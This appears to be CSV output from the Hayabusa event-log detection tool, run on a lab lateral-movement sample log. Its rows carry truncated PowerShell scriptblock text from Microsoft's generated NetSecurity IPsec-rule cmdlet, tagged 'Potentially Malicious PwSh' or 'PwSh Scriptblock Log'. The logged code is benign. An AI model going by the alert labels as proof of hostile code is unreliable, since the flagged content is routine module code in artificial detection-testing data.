${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'En",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,abled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = 
${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = 
${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { 
[object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In';,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,abled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { 
[object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 